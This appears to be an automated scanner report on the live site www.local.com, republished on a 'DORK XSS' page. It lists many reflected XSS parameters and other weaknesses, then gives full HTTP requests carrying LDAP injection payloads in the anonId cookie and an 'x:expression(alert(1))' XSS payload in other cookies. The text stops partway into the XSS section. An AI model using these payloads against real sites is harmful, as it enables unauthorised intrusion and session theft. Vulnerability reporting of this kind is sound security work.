DORK, XSS, Cross Site Scripting, www.local.com

XSS in www.local.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:04:36 CST 2011.



DORK CWE-79 XSS Report

Loading

1. LDAP injection

2. Cross-site scripting (reflected)

2.1. http://www.local.com/dart/ [cat parameter]

2.2. http://www.local.com/dart/ [cat parameter]

2.3. http://www.local.com/dart/ [css parameter]

2.4. http://www.local.com/dart/ [l parameter]

2.5. http://www.local.com/dart/ [l parameter]

2.6. http://www.local.com/dart/ [ord parameter]

2.7. http://www.local.com/dart/ [ord parameter]

2.8. http://www.local.com/dart/ [p parameter]

2.9. http://www.local.com/dart/ [p parameter]

2.10. http://www.local.com/dart/ [pos parameter]

2.11. http://www.local.com/dart/ [pos parameter]

2.12. http://www.local.com/dart/ [sz parameter]

2.13. http://www.local.com/dart/ [sz parameter]

2.14. http://www.local.com/dart/ [t parameter]

2.15. http://www.local.com/dart/ [t parameter]

2.16. http://www.local.com/dart/ [zone parameter]

2.17. http://www.local.com/dart/ [zone parameter]

2.18. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

2.19. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

2.20. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

2.21. http://www.local.com/results.aspx [cid parameter]

2.22. http://www.local.com/results.aspx [cid parameter]

2.23. http://www.local.com/results.aspx [client parameter]

2.24. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]

2.25. http://www.local.com/topics/ [keyword parameter]

2.26. http://www.local.com/ver1.0/Direct/Jsonp [cb parameter]

2.27. http://www.local.com/ver1.0/ReviewPage.app [articleKey parameter]

3. Cleartext submission of password

3.1. http://www.local.com/

3.2. http://www.local.com/business/

3.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

3.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

3.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

3.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

3.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

3.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

3.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

3.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

3.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

3.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

3.13. http://www.local.com/business/results/

3.14. http://www.local.com/contact.aspx

3.15. http://www.local.com/coupons/

3.16. http://www.local.com/coupons/printable/

3.17. http://www.local.com/dialogs/register.aspx

3.18. http://www.local.com/events/

3.19. http://www.local.com/events/category/music/dallas-tx.aspx

3.20. http://www.local.com/events/category/performing-arts/dallas-tx.aspx

3.21. http://www.local.com/events/category/sports/dallas-tx.aspx

3.22. http://www.local.com/faq.aspx

3.23. http://www.local.com/privacy/

3.24. http://www.local.com/results.aspx

3.25. http://www.local.com/results/

3.26. http://www.local.com/sitemap.aspx

3.27. http://www.local.com/sitemap/chicago-il.aspx

3.28. http://www.local.com/sitemap/los-angeles-ca.aspx

3.29. http://www.local.com/sitemap/new-york-ny.aspx

3.30. http://www.local.com/terms/

3.31. http://www.local.com/topics/

4. Password field submitted using GET method

4.1. http://www.local.com/

4.2. http://www.local.com/business/

4.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

4.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

4.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

4.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

4.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

4.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

4.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

4.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

4.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

4.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

4.13. http://www.local.com/business/results/

4.14. http://www.local.com/contact.aspx

4.15. http://www.local.com/coupons/

4.16. http://www.local.com/coupons/printable/

4.17. http://www.local.com/events/

4.18. http://www.local.com/events/category/music/dallas-tx.aspx

4.19. http://www.local.com/events/category/performing-arts/dallas-tx.aspx

4.20. http://www.local.com/events/category/sports/dallas-tx.aspx

4.21. http://www.local.com/faq.aspx

4.22. http://www.local.com/privacy/

4.23. http://www.local.com/results.aspx

4.24. http://www.local.com/results/

4.25. http://www.local.com/sitemap.aspx

4.26. http://www.local.com/sitemap/chicago-il.aspx

4.27. http://www.local.com/sitemap/los-angeles-ca.aspx

4.28. http://www.local.com/sitemap/new-york-ny.aspx

4.29. http://www.local.com/terms/

4.30. http://www.local.com/topics/

5. Password field with autocomplete enabled

5.1. http://www.local.com/

5.2. http://www.local.com/business/

5.3. http://www.local.com/business/

5.4. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

5.5. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

5.6. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

5.7. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

5.8. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

5.9. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

5.10. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

5.11. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

5.12. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

5.13. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

5.14. http://www.local.com/business/results/

5.15. http://www.local.com/business/results/

5.16. http://www.local.com/contact.aspx

5.17. http://www.local.com/coupons/

5.18. http://www.local.com/coupons/

5.19. http://www.local.com/coupons/printable/

5.20. http://www.local.com/dialogs/register.aspx

5.21. http://www.local.com/events/

5.22. http://www.local.com/events/

5.23. http://www.local.com/events/category/music/dallas-tx.aspx

5.24. http://www.local.com/events/category/performing-arts/dallas-tx.aspx

5.25. http://www.local.com/events/category/sports/dallas-tx.aspx

5.26. http://www.local.com/faq.aspx

5.27. http://www.local.com/privacy/

5.28. http://www.local.com/results.aspx

5.29. http://www.local.com/results.aspx

5.30. http://www.local.com/results/

5.31. http://www.local.com/results/

5.32. http://www.local.com/sitemap.aspx

5.33. http://www.local.com/sitemap/chicago-il.aspx

5.34. http://www.local.com/sitemap/los-angeles-ca.aspx

5.35. http://www.local.com/sitemap/new-york-ny.aspx

5.36. http://www.local.com/terms/

5.37. http://www.local.com/topics/

5.38. http://www.local.com/topics/

6. Source code disclosure

7. Cookie scoped to parent domain

7.1. http://www.local.com/

7.2. http://www.local.com/business/

7.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

7.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

7.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

7.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

7.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

7.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

7.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

7.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

7.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

7.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

7.13. http://www.local.com/business/results/

7.14. http://www.local.com/contact.aspx

7.15. http://www.local.com/coupons/

7.16. http://www.local.com/coupons/printable/

7.17. http://www.local.com/details/photos/dallas-tx/amegy-bank-97648000/

7.18. http://www.local.com/details/photos/dallas-tx/cet-products-liquidators-9985416/

7.19. http://www.local.com/details/photos/dallas-tx/equity-bank-63975058/

7.20. http://www.local.com/details/photos/dallas-tx/hillcrest-bank-104826937/

7.21. http://www.local.com/details/photos/dallas-tx/sterling-bank-16856575/

7.22. http://www.local.com/dialogs/account/acctreg.aspx

7.23. http://www.local.com/dialogs/network.aspx

7.24. http://www.local.com/dialogs/register.aspx

7.25. http://www.local.com/events/

7.26. http://www.local.com/events/category/music/dallas-tx.aspx

7.27. http://www.local.com/events/category/performing-arts/dallas-tx.aspx

7.28. http://www.local.com/events/category/sports/dallas-tx.aspx

7.29. http://www.local.com/faq.aspx

7.30. http://www.local.com/privacy/

7.31. http://www.local.com/results.aspx

7.32. http://www.local.com/results/

7.33. http://www.local.com/sitemap.aspx

7.34. http://www.local.com/sitemap/chicago-il.aspx

7.35. http://www.local.com/sitemap/los-angeles-ca.aspx

7.36. http://www.local.com/sitemap/new-york-ny.aspx

7.37. http://www.local.com/terms/

7.38. http://www.local.com/topics/

7.39. http://www.local.com/ver1.0/Direct/JavascriptSDKProxy

7.40. http://www.local.com/ver1.0/Direct/Jsonp

7.41. http://www.local.com/ver1.0/Photo/Upload

7.42. http://www.local.com/ver1.0/ReviewPage.app

7.43. http://www.local.com/ver1.0/Video/Upload

8. Cross-domain Referer leakage

8.1. http://www.local.com/business/

8.2. http://www.local.com/business/results/

8.3. http://www.local.com/business/v3/js/globalbusiness_3_5.js

8.4. http://www.local.com/coupons/

8.5. http://www.local.com/dart/

8.6. http://www.local.com/dart/

8.7. http://www.local.com/dart/

8.8. http://www.local.com/dart/

8.9. http://www.local.com/dart/

8.10. http://www.local.com/dart/

8.11. http://www.local.com/dart/

8.12. http://www.local.com/dart/

8.13. http://www.local.com/dart/

8.14. http://www.local.com/dart/

8.15. http://www.local.com/dart/

8.16. http://www.local.com/dart/

8.17. http://www.local.com/dart/

8.18. http://www.local.com/dart/

8.19. http://www.local.com/dart/

8.20. http://www.local.com/dart/

8.21. http://www.local.com/dart/

8.22. http://www.local.com/dart/

8.23. http://www.local.com/dart/

8.24. http://www.local.com/dart/

8.25. http://www.local.com/dart/

8.26. http://www.local.com/dart/

8.27. http://www.local.com/dart/

8.28. http://www.local.com/dart/

8.29. http://www.local.com/dart/

8.30. http://www.local.com/dart/

8.31. http://www.local.com/dart/

8.32. http://www.local.com/dart/

8.33. http://www.local.com/dart/

8.34. http://www.local.com/dart/

8.35. http://www.local.com/dart/

8.36. http://www.local.com/dart/

8.37. http://www.local.com/dart/

8.38. http://www.local.com/dart/

8.39. http://www.local.com/dart/

8.40. http://www.local.com/dart/

8.41. http://www.local.com/dart/

8.42. http://www.local.com/dart/

8.43. http://www.local.com/dart/

8.44. http://www.local.com/dart/

8.45. http://www.local.com/dart/

8.46. http://www.local.com/dart/

8.47. http://www.local.com/dart/

8.48. http://www.local.com/dart/

8.49. http://www.local.com/dart/

8.50. http://www.local.com/dart/

8.51. http://www.local.com/dart/

8.52. http://www.local.com/dart/

8.53. http://www.local.com/dart/

8.54. http://www.local.com/dart/

8.55. http://www.local.com/dart/

8.56. http://www.local.com/dart/

8.57. http://www.local.com/dart/

8.58. http://www.local.com/dart/

8.59. http://www.local.com/dart/

8.60. http://www.local.com/dart/

8.61. http://www.local.com/dart/

8.62. http://www.local.com/dialogs/register.aspx

8.63. http://www.local.com/events/

8.64. http://www.local.com/results.aspx

8.65. http://www.local.com/results/

8.66. http://www.local.com/topics/

9. Cross-domain script include

9.1. http://www.local.com/

9.2. http://www.local.com/business/

9.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

9.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

9.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

9.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

9.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

9.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

9.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

9.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

9.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

9.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

9.13. http://www.local.com/business/results/

9.14. http://www.local.com/business/results/

9.15. http://www.local.com/contact.aspx

9.16. http://www.local.com/coupons/

9.17. http://www.local.com/coupons/printable/

9.18. http://www.local.com/details/photos/dallas-tx/amegy-bank-97648000/

9.19. http://www.local.com/details/photos/dallas-tx/cet-products-liquidators-9985416/

9.20. http://www.local.com/details/photos/dallas-tx/equity-bank-63975058/

9.21. http://www.local.com/details/photos/dallas-tx/hillcrest-bank-104826937/

9.22. http://www.local.com/details/photos/dallas-tx/sterling-bank-16856575/

9.23. http://www.local.com/dialogs/account/acctreg.aspx

9.24. http://www.local.com/dialogs/register.aspx

9.25. http://www.local.com/events/

9.26. http://www.local.com/events/category/music/dallas-tx.aspx

9.27. http://www.local.com/events/category/performing-arts/dallas-tx.aspx

9.28. http://www.local.com/events/category/sports/dallas-tx.aspx

9.29. http://www.local.com/faq.aspx

9.30. http://www.local.com/privacy/

9.31. http://www.local.com/results.aspx

9.32. http://www.local.com/results.aspx

9.33. http://www.local.com/results/

9.34. http://www.local.com/results/

9.35. http://www.local.com/sitemap.aspx

9.36. http://www.local.com/sitemap/chicago-il.aspx

9.37. http://www.local.com/sitemap/los-angeles-ca.aspx

9.38. http://www.local.com/sitemap/new-york-ny.aspx

9.39. http://www.local.com/terms/

9.40. http://www.local.com/topics/

9.41. http://www.local.com/topics/

10. Cookie without HttpOnly flag set

10.1. http://www.local.com/

10.2. http://www.local.com/business/

10.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

10.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

10.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

10.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

10.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

10.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

10.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

10.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

10.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

10.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

10.13. http://www.local.com/business/results/

10.14. http://www.local.com/contact.aspx

10.15. http://www.local.com/coupons/

10.16. http://www.local.com/coupons/printable/

10.17. http://www.local.com/details/photos/dallas-tx/amegy-bank-97648000/

10.18. http://www.local.com/details/photos/dallas-tx/cet-products-liquidators-9985416/

10.19. http://www.local.com/details/photos/dallas-tx/equity-bank-63975058/

10.20. http://www.local.com/details/photos/dallas-tx/hillcrest-bank-104826937/

10.21. http://www.local.com/details/photos/dallas-tx/sterling-bank-16856575/

10.22. http://www.local.com/dialogs/account/acctreg.aspx

10.23. http://www.local.com/dialogs/network.aspx

10.24. http://www.local.com/dialogs/register.aspx

10.25. http://www.local.com/events/

10.26. http://www.local.com/events/category/music/dallas-tx.aspx

10.27. http://www.local.com/events/category/performing-arts/dallas-tx.aspx

10.28. http://www.local.com/events/category/sports/dallas-tx.aspx

10.29. http://www.local.com/faq.aspx

10.30. http://www.local.com/privacy/

10.31. http://www.local.com/results.aspx

10.32. http://www.local.com/results/

10.33. http://www.local.com/sitemap.aspx

10.34. http://www.local.com/sitemap/chicago-il.aspx

10.35. http://www.local.com/sitemap/los-angeles-ca.aspx

10.36. http://www.local.com/sitemap/new-york-ny.aspx

10.37. http://www.local.com/terms/

10.38. http://www.local.com/topics/

10.39. http://www.local.com/ver1.0/Direct/JavascriptSDKProxy

10.40. http://www.local.com/ver1.0/Direct/Jsonp

10.41. http://www.local.com/ver1.0/Photo/Upload

10.42. http://www.local.com/ver1.0/ReviewPage.app

10.43. http://www.local.com/ver1.0/Video/Upload

11. Email addresses disclosed

11.1. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

11.2. http://www.local.com/business/v3/js/globalbusiness_3_5.js

11.3. http://www.local.com/js/s_code.js

11.4. http://www.local.com/privacy/

11.5. http://www.local.com/terms/

12. HTML does not specify charset

12.1. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/javascript:void(0)

12.2. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/javascript:void(0)

12.3. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/javascript:void(0)

12.4. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/javascript:void(0)

12.5. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/javascript:void(0)

12.6. http://www.local.com/ver1.0/ReviewPage.app

13. Content type incorrectly stated

13.1. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/javascript:void(0)

13.2. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/javascript:void(0)

13.3. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/javascript:void(0)

13.4. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/javascript:void(0)

13.5. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/javascript:void(0)

13.6. http://www.local.com/business/skins/default/images/locm_transhadow_v001.jpg

13.7. http://www.local.com/ver1.0/ReviewPage.app



1. LDAP injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.local.com
Path:   /

Issue detail

The anonId cookie appears to be vulnerable to LDAP injection attacks.

The payloads 369bbd54d1b325fa)(sn=* and 369bbd54d1b325fa)!(sn=* were each submitted in the anonId cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=369bbd54d1b325fa)(sn=*; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28066
Date: Thu, 03 Feb 2011 16:52:30 GMT
Content-Length: 28066
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:52:30 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
<div class="homeBigImage mTB15" style="background: url(/sitetemplates/local.com/skins/default/images/homepage/sisters_on_beach.jpg) no-repeat 0 0;">
           <div id="finderWrap" class="homeKeyWrap">
               <div omn_key="H:501:1:5001" onclick="return loc_click(this);"><div class="findBusinessTab fl"></div></div>
               <div omn_key="H:501:1:5002" onclick="return loc_click(this);"><div class="findCouponsTab fl"></div></div>
               <div omn_key="H:501:1:5003" onclick="return loc_click(this);"><div class="findEventsTab fl"></div></div>
               <div class="clear"></div>
               <div class="homeKeyWrap">
                   <div class="homeKeyTop fl"></div>
                   <div class="findTR fl"></div>
                   <div class="clear"></div>                    
                   
                   

<div class="homeKeyContent" style="display: none;" id="finder-business">
   <form onsubmit="return BusinessSearch(this);">
       <input type="hidden" name="searchType" value="//business/results" />
       <h4 class="mL15 mB15" style="color:#8e8e8e; font-size: 11px;">Search for local businesses (e.g. Pets, Autos, Cafes)</h4>
       <input omn_key="H:501:1:3011" onclick="return loc_click(this);" class="searchKeyBtn fr" type="submit" value="" />
       <input class="input486 mL15 hpInput" type="text" id="keyword" name="keyword"/>
       <input type="text" style="display:none" />
   </form>
</div>
                   
                   

<div class="homeKeyContent" style="display: none;" id="finder-coupons">
   <form onsubmit="return CouponSearch(this);">
       <input type="hidden" name="searchType" value="coupons/printable" />
       <h4 class="mL15 mB15" style="color:#8e8e8e; font-size: 11px;">Search for money saving coupons (e.g. Clothing, Food, Auto Repair)</h4>
       <input omn_key="H:501:1:3011" onclick="return loc_click(this);" class="searchKeyBtn fr" type="submit" value="" />
       <input class="input486 mL15 hpInput" type="text" id="keyword" name="keyword"/>
       <input type="text" style="display:none" />
   </form>
</div>
                   
                   

<div class="homeKeyContent" style="display: none;" id="finder-events">
   <form onsubmit="return EventSearch(this);">
       <input type="hidden" name="searchType" value="events/events" />

...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=369bbd54d1b325fa)!(sn=*; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28055
Date: Thu, 03 Feb 2011 16:52:31 GMT
Content-Length: 28055
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:52:31 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
<div class="homeBigImage mTB15" style="background: url(/sitetemplates/local.com/skins/default/images/homepage/coffee.jpg) no-repeat 0 0;">
           <div id="finderWrap" class="homeKeyWrap">
               <div omn_key="H:501:1:5001" onclick="return loc_click(this);"><div class="findBusinessTab fl"></div></div>
               <div omn_key="H:501:1:5002" onclick="return loc_click(this);"><div class="findCouponsTab fl"></div></div>
               <div omn_key="H:501:1:5003" onclick="return loc_click(this);"><div class="findEventsTab fl"></div></div>
               <div class="clear"></div>
               <div class="homeKeyWrap">
                   <div class="homeKeyTop fl"></div>
                   <div class="findTR fl"></div>
                   <div class="clear"></div>                    
                   
                   

<div class="homeKeyContent" style="display: none;" id="finder-business">
   <form onsubmit="return BusinessSearch(this);">
       <input type="hidden" name="searchType" value="//business/results" />
       <h4 class="mL15 mB15" style="color:#8e8e8e; font-size: 11px;">Search for local businesses (e.g. Pets, Autos, Cafes)</h4>
       <input omn_key="H:501:1:3011" onclick="return loc_click(this);" class="searchKeyBtn fr" type="submit" value="" />
       <input class="input486 mL15 hpInput" type="text" id="keyword" name="keyword"/>
       <input type="text" style="display:none" />
   </form>
</div>
                   
                   

<div class="homeKeyContent" style="display: none;" id="finder-coupons">
   <form onsubmit="return CouponSearch(this);">
       <input type="hidden" name="searchType" value="coupons/printable" />
       <h4 class="mL15 mB15" style="color:#8e8e8e; font-size: 11px;">Search for money saving coupons (e.g. Clothing, Food, Auto Repair)</h4>
       <input omn_key="H:501:1:3011" onclick="return loc_click(this);" class="searchKeyBtn fr" type="submit" value="" />
       <input class="input486 mL15 hpInput" type="text" id="keyword" name="keyword"/>
       <input type="text" style="display:none" />
   </form>
</div>
                   
                   

<div class="homeKeyContent" style="display: none;" id="finder-events">
   <form onsubmit="return EventSearch(this);">
       <input type="hidden" name="searchType" value="events/events" />
       <h4 clas
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 27 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

